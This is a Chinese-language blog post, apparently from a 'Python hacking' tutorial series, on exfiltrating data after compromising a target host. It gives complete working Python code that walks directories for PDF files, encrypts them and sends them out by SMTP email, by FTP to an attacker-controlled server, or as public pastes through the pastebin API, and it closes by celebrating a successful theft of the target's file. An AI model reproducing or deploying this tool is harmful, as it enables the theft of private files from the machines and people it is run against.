Python黑客编程之数据渗漏

标签：ftp api Python smtp server 渗漏黑客 path paste

描述

入侵到目标主机后，发现有趣的文件，将其加密后，通过ftp文件\邮件\第三方网站的方式将密文传输到自己的机子上，在本地还原数据文件

利用邮件传输

# smtp
smtp_server = 'smtp.163.com'
smtp_port = 587
smtp_acct = '[email protected]'
smtp_password = '123456'
tgt_accts = ['[email protected]']
def plain_email(subject, contents):
    message = f"Subject: {subject}\nFrom {smtp_acct}\n"
    message += f'To: {tgt_accts}\n\n{contents.decode()}'
    server = smtplib.SMTP(smtp_server, smtp_port)
    server.starttls()
    server.login(smtp_acct, smtp_password)
    server.sendmail(smtp_acct, tgt_accts, message)
    time.sleep(1)
    server.quit()

利用ftp文件传输

#ftp
ftp_srv = '192.168.43.126'
ftp_usr = 'z5onk0'
ftp_pwd = 'aaaaaa'
def plain_ftp(docpath, server=ftp_srv):
    ftp = ftplib.FTP(server)
    ftp.login(ftp_usr, ftp_pwd)
    ftp.cwd('/home/test')
    ftp.storbinary("STOR " + os.path.basename(docpath),
                   open(docpath, "rb"), 1024)
    ftp.quit()

利用第三方网站pastebin传输

需要注册账号，然后分配一个api_dev_key

# web server
username = "z5onk0"
password = 'aaaaaa'
api_dev_key = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
def plain_paste(title, content):
    login_url = 'https://pastebin.com/api/api_login.php'
    login_data = {
        'api_dev_key': api_dev_key,
        'api_user_name': username,
        'api_user_password': password,
    }
    r = requests.post(login_url, data=login_data)
    api_user_key = r.text

    paste_url = 'https://pastebin.com/api/api_post.php'
    paste_data = {
        'api_paste_name': title,
        'api_paste_code': content.decode(),
        'api_dev_key': api_dev_key,
        'api_user_key': api_user_key,
        'api_option': 'paste',
        'api_paste_private': 0,
    }
    r = requests.post(paste_url, data=paste_data)
    print(r.status_code)
    print(r.text)

方法调度

遍历目标目录，找到某一后缀名的文件，yield返回文件路径
通过字典调度实现传输方法的调用：传入要选择的函数名，即可调用该函数，python函数是一等公民！
调用上一篇的encrypt函数对文件内容加密

#select way
WAY = {
    'email': plain_email,
    'ftp': plain_ftp,
    'web': plain_paste,
}

def find_files(direcory, doc_type='.pdf'):
    for parent, _, filenames in os.walk(direcory):
        for filename in filenames:
            if filename.endswith(doc_type):
                file_path = os.path.join(parent, filename)
                yield file_path

def dataleak(ori_path, method):
    if method == 'ftp':
        new_path = f'c:\\windows\\temp\\{os.path.basename(ori_path)}'
        with open(ori_path, 'rb') as f1:
            contents = f1.read()
        with open(new_path, 'wb') as f2:
            f2.write(encrypt(contents))

        WAY[method](new_path)
        os.unlink(new_path)

    else:
        with open(ori_path, 'rb') as f:
            contents = f.read()
        title = os.path.basename(ori_path)
        contents = encrypt(contents)
        WAY[method](title, contents)

完整代码

import ftplib
import os
import smtplib
import time
from encrypt import encrypt, decrypt
import requests

# smtp
smtp_server = 'smtp.163.com'
smtp_port = 587
smtp_acct = '[email protected]'
smtp_password = '123456'
tgt_accts = ['[email protected]']
def plain_email(subject, contents):
    message = f"Subject: {subject}\nFrom {smtp_acct}\n"
    message += f'To: {tgt_accts}\n\n{contents.decode()}'
    server = smtplib.SMTP(smtp_server, smtp_port)
    server.starttls()
    server.login(smtp_acct, smtp_password)
    server.sendmail(smtp_acct, tgt_accts, message)
    time.sleep(1)
    server.quit()

#ftp
ftp_srv = '192.168.43.126'
ftp_usr = 'z5onk0'
ftp_pwd = 'aaaaaa'
def plain_ftp(docpath, server=ftp_srv):
    ftp = ftplib.FTP(server)
    ftp.login(ftp_usr, ftp_pwd)
    ftp.cwd('/home/dfl')
    ftp.storbinary("STOR " + os.path.basename(docpath),
                   open(docpath, "rb"), 1024)
    ftp.quit()

# web server
username = "z5onk0"
password = 'aaaaaa'
api_dev_key = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
def plain_paste(title, content):
    login_url = 'https://pastebin.com/api/api_login.php'
    login_data = {
        'api_dev_key': api_dev_key,
        'api_user_name': username,
        'api_user_password': password,
    }
    r = requests.post(login_url, data=login_data)
    api_user_key = r.text

    paste_url = 'https://pastebin.com/api/api_post.php'
    paste_data = {
        'api_paste_name': title,
        'api_paste_code': content.decode(),
        'api_dev_key': api_dev_key,
        'api_user_key': api_user_key,
        'api_option': 'paste',
        'api_paste_private': 0,
    }
    r = requests.post(paste_url, data=paste_data)
    print(r.status_code)
    print(r.text)

#select way
WAY = {
    'email': plain_email,
    'ftp': plain_ftp,
    'web': plain_paste,
}

def find_files(direcory, doc_type='.pdf'):
    for parent, _, filenames in os.walk(direcory):
        for filename in filenames:
            if filename.endswith(doc_type):
                file_path = os.path.join(parent, filename)
                yield file_path

def dataleak(ori_path, method):
    if method == 'ftp':
        new_path = f'c:\\windows\\temp\\{os.path.basename(ori_path)}'
        with open(ori_path, 'rb') as f1:
            contents = f1.read()
        with open(new_path, 'wb') as f2:
            f2.write(encrypt(contents))

        WAY[method](new_path)
        os.unlink(new_path)

    else:
        with open(ori_path, 'rb') as f:
            contents = f.read()
        title = os.path.basename(ori_path)
        contents = encrypt(contents)
        WAY[method](title, contents)

if __name__ =="__main__":
    dir = os.getcwd()
    for file in find_files(dir):
        dataleak(file, 'ftp')

结果

选择paste方式传输，生成pastebin的网址
进入网址，看到已经上传的密文
用上一篇的decrypt函数进行解密，并写入到pdf文件中，下图中，左边pdf是目标机器上的原文件，右边pdf是传输到本地机器上还原后的文件，成功偷取目标文件！

标签：ftp,api,Python,smtp,server,渗漏,黑客,path,paste
From： https://www.cnblogs.com/z5onk0/p/17124150.html

Python黑客编程之数据渗漏

描述

利用邮件传输

利用ftp文件传输

利用第三方网站pastebin传输

方法调度

完整代码

结果

相关文章

赞助商

阅读排行